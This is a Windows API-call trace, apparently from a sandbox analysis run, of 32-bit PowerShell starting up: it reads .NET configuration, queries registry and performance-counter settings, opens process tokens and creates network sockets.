	[0231.233] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.233] GetLastError () returned 0xcb
	[0231.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.376] GetLastError () returned 0xcb
	[0231.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.379] GetLastError () returned 0xcb
	[0231.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.381] GetLastError () returned 0xcb
	[0231.394] VirtualQuery (in: lpAddress=0x5fae57c, lpBuffer=0x5faf57c, dwLength=0x1c | out: lpBuffer=0x5faf57c*(BaseAddress=0x5fae000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0231.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.395] GetLastError () returned 0xcb
	[0231.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.492] GetLastError () returned 0xcb
	[0231.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.492] GetLastError () returned 0xcb
	[0231.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.501] GetLastError () returned 0xcb
	[0231.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.669] GetLastError () returned 0xcb
	[0231.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.883] GetLastError () returned 0xcb
	[0231.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.886] GetLastError () returned 0xcb
	[0231.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.887] GetLastError () returned 0xcb
	[0231.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.889] GetLastError () returned 0xcb
	[0231.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.891] GetLastError () returned 0xcb
	[0231.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.897] GetLastError () returned 0xcb
	[0231.899] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.899] GetLastError () returned 0xcb
	[0232.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.074] GetLastError () returned 0xcb
	[0232.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f1518, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.621] GetLastError () returned 0xcb
	[0232.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f1518, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.625] GetLastError () returned 0xcb
	[0234.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5fae39c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0234.805] GetLastError () returned 0xcb
	[0234.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5fae350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0234.806] GetLastError () returned 0xcb
	[0234.808] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x567598, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0234.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5fae3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0234.809] GetLastError () returned 0x0
	[0234.935] GetCurrentProcess () returned 0xffffffff
	[0234.935] GetLastError () returned 0x3f0
	[0234.935] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fae4e8 | out: TokenHandle=0x5fae4e8*=0x374) returned 1
	[0234.935] GetLastError () returned 0x3f0
	[0234.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x5fae080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
	[0234.940] GetLastError () returned 0x0
	[0234.948] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5fae528 | out: lpFileInformation=0x5fae528*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0234.948] GetLastError () returned 0x0
	[0235.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5fae040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0235.051] GetLastError () returned 0x0
	[0235.059] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5fae524 | out: lpFileInformation=0x5fae524*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0235.059] GetLastError () returned 0x0
	[0235.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5fadf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0235.059] GetLastError () returned 0x0
	[0235.059] SetErrorMode (uMode=0x1) returned 0x1
	[0235.060] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x390
	[0235.060] GetLastError () returned 0x0
	[0235.060] GetFileType (hFile=0x390) returned 0x1
	[0235.060] SetErrorMode (uMode=0x1) returned 0x1
	[0235.060] GetFileType (hFile=0x390) returned 0x1
	[0235.070] GetFileSize (in: hFile=0x390, lpFileSizeHigh=0x5fae4f8 | out: lpFileSizeHigh=0x5fae4f8*=0x0) returned 0x60ed
	[0235.070] GetLastError () returned 0x0
	[0235.070] ReadFile (in: hFile=0x390, lpBuffer=0x2b19138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fae4b0, lpOverlapped=0x0 | out: lpBuffer=0x2b19138*, lpNumberOfBytesRead=0x5fae4b0*=0x1000, lpOverlapped=0x0) returned 1
	[0235.072] GetLastError () returned 0x0
	[0235.176] ReadFile (in: hFile=0x390, lpBuffer=0x2b19138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fae168, lpOverlapped=0x0 | out: lpBuffer=0x2b19138*, lpNumberOfBytesRead=0x5fae168*=0x1000, lpOverlapped=0x0) returned 1
	[0235.176] GetLastError () returned 0x0
	[0235.177] ReadFile (in: hFile=0x390, lpBuffer=0x2b19138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fae168, lpOverlapped=0x0 | out: lpBuffer=0x2b19138*, lpNumberOfBytesRead=0x5fae168*=0x1000, lpOverlapped=0x0) returned 1
	[0235.178] GetLastError () returned 0x0
	[0235.178] ReadFile (in: hFile=0x390, lpBuffer=0x2b19138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fae168, lpOverlapped=0x0 | out: lpBuffer=0x2b19138*, lpNumberOfBytesRead=0x5fae168*=0x1000, lpOverlapped=0x0) returned 1
	[0235.178] GetLastError () returned 0x0
	[0235.178] ReadFile (in: hFile=0x390, lpBuffer=0x2b19138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fae168, lpOverlapped=0x0 | out: lpBuffer=0x2b19138*, lpNumberOfBytesRead=0x5fae168*=0x1000, lpOverlapped=0x0) returned 1
	[0235.178] GetLastError () returned 0x0
	[0235.195] ReadFile (in: hFile=0x390, lpBuffer=0x2b19138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fae29c, lpOverlapped=0x0 | out: lpBuffer=0x2b19138*, lpNumberOfBytesRead=0x5fae29c*=0x1000, lpOverlapped=0x0) returned 1
	[0235.195] GetLastError () returned 0x0
	[0235.195] ReadFile (in: hFile=0x390, lpBuffer=0x2b19138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fae130, lpOverlapped=0x0 | out: lpBuffer=0x2b19138*, lpNumberOfBytesRead=0x5fae130*=0xed, lpOverlapped=0x0) returned 1
	[0235.196] GetLastError () returned 0x0
	[0235.196] ReadFile (in: hFile=0x390, lpBuffer=0x2b19138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fae1e8, lpOverlapped=0x0 | out: lpBuffer=0x2b19138*, lpNumberOfBytesRead=0x5fae1e8*=0x0, lpOverlapped=0x0) returned 1
	[0235.196] GetLastError () returned 0x0
	[0235.198] CloseHandle (hObject=0x390) returned 1
	[0235.198] GetLastError () returned 0x0
	[0235.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5fae39c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0235.204] GetLastError () returned 0x0
	[0235.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5fae350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0235.204] GetLastError () returned 0x0
	[0235.204] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x567598, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0235.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5fae3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0235.204] GetLastError () returned 0x0
	[0235.205] GetCurrentProcess () returned 0xffffffff
	[0235.205] GetLastError () returned 0x3f0
	[0235.205] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fae778 | out: TokenHandle=0x5fae778*=0x390) returned 1
	[0235.205] GetLastError () returned 0x3f0
	[0235.207] GetCurrentProcess () returned 0xffffffff
	[0235.207] GetLastError () returned 0x3f0
	[0235.207] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fae778 | out: TokenHandle=0x5fae778*=0x38c) returned 1
	[0235.207] GetLastError () returned 0x3f0
	[0235.216] GetCurrentProcess () returned 0xffffffff
	[0235.216] GetLastError () returned 0x3f0
	[0235.216] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fae4e8 | out: TokenHandle=0x5fae4e8*=0x394) returned 1
	[0235.216] GetLastError () returned 0x3f0
	[0235.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5fae528 | out: lpFileInformation=0x5fae528*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0235.216] GetLastError () returned 0x2
	[0235.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5fae040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0235.216] GetLastError () returned 0x2
	[0235.217] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5fae524 | out: lpFileInformation=0x5fae524*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0235.217] GetLastError () returned 0x2
	[0235.217] GetCurrentProcess () returned 0xffffffff
	[0235.217] GetLastError () returned 0x3f0
	[0235.217] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fae778 | out: TokenHandle=0x5fae778*=0x398) returned 1
	[0235.217] GetLastError () returned 0x3f0
	[0235.344] GetCurrentProcess () returned 0xffffffff
	[0235.344] GetLastError () returned 0x3f0
	[0235.344] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fae778 | out: TokenHandle=0x5fae778*=0x39c) returned 1
	[0235.344] GetLastError () returned 0x3f0
	[0235.379] GetCurrentProcess () returned 0xffffffff
	[0235.379] GetLastError () returned 0x3f0
	[0235.380] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fae554 | out: TokenHandle=0x5fae554*=0x3d4) returned 1
	[0235.380] GetLastError () returned 0x3f0
	[0235.641] GetCurrentProcess () returned 0xffffffff
	[0235.641] GetLastError () returned 0x3f0
	[0235.641] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fae564 | out: TokenHandle=0x5fae564*=0x3d8) returned 1
	[0235.641] GetLastError () returned 0x3f0
	[0235.860] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4f1518 | out: lpWSAData=0x4f1518) returned 0
	[0235.871] GetLastError () returned 0x0
	[0235.880] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fae104 | out: phkResult=0x5fae104*=0x3e4) returned 0x0
	[0235.881] RegQueryValueExW (in: hKey=0x3e4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5fae14c, lpData=0x0, lpcbData=0x5fae148*=0x0 | out: lpType=0x5fae14c*=0x1, lpData=0x0, lpcbData=0x5fae148*=0xe) returned 0x0
	[0235.881] RegQueryValueExW (in: hKey=0x3e4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5fae14c, lpData=0x4f1518, lpcbData=0x5fae148*=0xe | out: lpType=0x5fae14c*=0x1, lpData="Client", lpcbData=0x5fae148*=0xe) returned 0x0
	[0235.882] RegCloseKey (hKey=0x3e4) returned 0x0
	[0236.003] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3e8
	[0236.011] GetLastError () returned 0x0
	[0236.011] setsockopt (s=0x3e8, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0236.011] GetLastError () returned 0x273a
	[0236.011] closesocket (s=0x3e8) returned 0
	[0236.011] GetLastError () returned 0x0
	[0236.011] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3e8
	[0236.014] GetLastError () returned 0x0
	[0236.015] setsockopt (s=0x3e8, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0236.015] GetLastError () returned 0x273a
	[0236.015] closesocket (s=0x3e8) returned 0
	[0236.015] GetLastError () returned 0x0
	[0236.020] GetCurrentProcess () returned 0xffffffff
	[0236.020] GetLastError () returned 0x3f0
	[0236.021] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fae520 | out: TokenHandle=0x5fae520*=0x3e8) returned 1
	[0236.021] GetLastError () returned 0x3f0
	[0236.028] GetCurrentProcess () returned 0xffffffff
	[0236.028] GetLastError () returned 0x3f0
	[0236.028] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fae530 | out: TokenHandle=0x5fae530*=0x3ec) returned 1
	[0236.028] GetLastError () returned 0x3f0
	[0236.142] GetCurrentProcessId () returned 0x6dc
	[0236.145] GetComputerNameW (in: lpBuffer=0x567598, nSize=0x2b36b80 | out: lpBuffer="XDUWTFONO", nSize=0x2b36b80) returned 1
	[0236.147] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fae784 | out: phkResult=0x5fae784*=0x3f0) returned 0x0
	[0236.147] RegQueryValueExW (in: hKey=0x3f0, lpValueName="Library", lpReserved=0x0, lpType=0x5fae7cc, lpData=0x0, lpcbData=0x5fae7c8*=0x0 | out: lpType=0x5fae7cc*=0x1, lpData=0x0, lpcbData=0x5fae7c8*=0x1c) returned 0x0
	[0236.147] RegQueryValueExW (in: hKey=0x3f0, lpValueName="Library", lpReserved=0x0, lpType=0x5fae7cc, lpData=0x4f1518, lpcbData=0x5fae7c8*=0x1c | out: lpType=0x5fae7cc*=0x1, lpData="netfxperf.dll", lpcbData=0x5fae7c8*=0x1c) returned 0x0
	[0236.147] RegQueryValueExW (in: hKey=0x3f0, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5fae7cc, lpData=0x0, lpcbData=0x5fae7c8*=0x0 | out: lpType=0x5fae7cc*=0x4, lpData=0x0, lpcbData=0x5fae7c8*=0x4) returned 0x0
	[0236.150] RegQueryValueExW (in: hKey=0x3f0, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5fae7cc, lpData=0x5fae7b8, lpcbData=0x5fae7c8*=0x4 | out: lpType=0x5fae7cc*=0x4, lpData=0x5fae7b8*=0x1, lpcbData=0x5fae7c8*=0x4) returned 0x0
	[0236.150] RegQueryValueExW (in: hKey=0x3f0, lpValueName="First Counter", lpReserved=0x0, lpType=0x5fae7cc, lpData=0x0, lpcbData=0x5fae7c8*=0x0 | out: lpType=0x5fae7cc*=0x4, lpData=0x0, lpcbData=0x5fae7c8*=0x4) returned 0x0
	[0236.150] RegQueryValueExW (in: hKey=0x3f0, lpValueName="First Counter", lpReserved=0x0, lpType=0x5fae7cc, lpData=0x5fae7b8, lpcbData=0x5fae7c8*=0x4 | out: lpType=0x5fae7cc*=0x4, lpData=0x5fae7b8*=0x137a, lpcbData=0x5fae7c8*=0x4) returned 0x0
	[0236.150] RegCloseKey (hKey=0x3f0) returned 0x0
	[0236.153] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fae780 | out: phkResult=0x5fae780*=0x3f0) returned 0x0
	[0236.153] RegQueryValueExW (in: hKey=0x3f0, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5fae7c8, lpData=0x0, lpcbData=0x5fae7c4*=0x0 | out: lpType=0x5fae7c8*=0x4, lpData=0x0, lpcbData=0x5fae7c4*=0x4) returned 0x0
	[0236.153] RegQueryValueExW (in: hKey=0x3f0, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5fae7c8, lpData=0x5fae7b4, lpcbData=0x5fae7c4*=0x4 | out: lpType=0x5fae7c8*=0x4, lpData=0x5fae7b4*=0x3, lpcbData=0x5fae7c4*=0x4) returned 0x0
	[0236.153] RegQueryValueExW (in: hKey=0x3f0, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5fae7c8, lpData=0x0, lpcbData=0x5fae7c4*=0x0 | out: lpType=0x5fae7c8*=0x4, lpData=0x0, lpcbData=0x5fae7c4*=0x4) returned 0x0
	[0236.153] RegQueryValueExW (in: hKey=0x3f0, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5fae7c8, lpData=0x5fae7b4, lpcbData=0x5fae7c4*=0x4 | out: lpType=0x5fae7c8*=0x4, lpData=0x5fae7b4*=0x20000, lpcbData=0x5fae7c4*=0x4) returned 0x0
	[0236.153] RegQueryValueExW (in: hKey=0x3f0, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5fae7c8, lpData=0x0, lpcbData=0x5fae7c4*=0x0 | out: lpType=0x5fae7c8*=0x3, lpData=0x0, lpcbData=0x5fae7c4*=0xaa) returned 0x0
	[0236.154] RegQueryValueExW (in: hKey=0x3f0, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5fae7c8, lpData=0x2b392c4, lpcbData=0x5fae7c4*=0xaa | out: lpType=0x5fae7c8*=0x3, lpData=0x2b392c4*, lpcbData=0x5fae7c4*=0xaa) returned 0x0
	[0236.158] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0236.265] GetLastError () returned 0x0
	[0236.269] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x4f1548, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0236.269] GetLastError () returned 0x5
	[0236.273] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3fc
	[0236.273] GetLastError () returned 0x5
	[0236.276] MapViewOfFile (hFileMappingObject=0x3fc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x5270000
	[0236.279] VirtualQuery (in: lpAddress=0x5270000, lpBuffer=0x5fae798, dwLength=0x1c | out: lpBuffer=0x5fae798*(BaseAddress=0x5270000, AllocationBase=0x5270000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c
	[0236.279] GetLastError () returned 0x5
	[0236.280] LocalFree (hMem=0x5551c8) returned 0x0
	[0236.280] RegCloseKey (hKey=0x3f0) returned 0x0
	[0236.283] GetVersionExW (in: lpVersionInformation=0x4f1530*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x4f1530*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0236.283] GetLastError () returned 0x5
	[0236.284] GetVersionExW (in: lpVersionInformation=0x4f1530*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x4f1530*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0236.284] GetLastError () returned 0x5
	[0236.286] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b39d40, cbSid=0x5fae778 | out: pSid=0x2b39d40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fae778) returned 1
	[0236.286] GetLastError () returned 0x5
	[0236.290] CreateMutexW (lpMutexAttributes=0x2b39e78, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0236.290] GetLastError () returned 0x5
	[0236.292] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0236.292] GetLastError () returned 0x5
	[0236.295] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0236.313] GetLastError () returned 0x5
	[0236.314] GetCurrentProcessId () returned 0x6dc
	[0236.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6dc) returned 0x404
	[0236.315] GetLastError () returned 0x5
	[0236.317] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x5fae6e0, lpExitTime=0x5fae6d8, lpKernelTime=0x5fae6d8, lpUserTime=0x5fae6d8 | out: lpCreationTime=0x5fae6e0, lpExitTime=0x5fae6d8, lpKernelTime=0x5fae6d8, lpUserTime=0x5fae6d8) returned 1
	[0236.317] GetLastError () returned 0x5
	[0236.318] CloseHandle (hObject=0x404) returned 1
	[0236.318] GetLastError () returned 0x5
	[0236.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x404
	[0236.318] GetLastError () returned 0x5
	[0236.318] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728 | out: lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728) returned 1
	[0236.318] GetLastError () returned 0x5
	[0236.319] CloseHandle (hObject=0x404) returned 1
	[0236.319] GetLastError () returned 0x5
	[0236.319] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x728) returned 0x404
	[0236.319] GetLastError () returned 0x5
	[0236.319] GetCurrentProcess () returned 0xffffffff
	[0236.319] GetLastError () returned 0x5
	[0236.319] GetCurrentProcess () returned 0xffffffff
	[0236.319] GetLastError () returned 0x5
	[0236.323] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fae690, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fae690*=0x408) returned 1
	[0236.323] GetLastError () returned 0x5
	[0236.380] CloseHandle (hObject=0x408) returned 1
	[0236.380] GetLastError () returned 0x5
	[0236.381] CloseHandle (hObject=0x404) returned 1
	[0236.381] GetLastError () returned 0x5
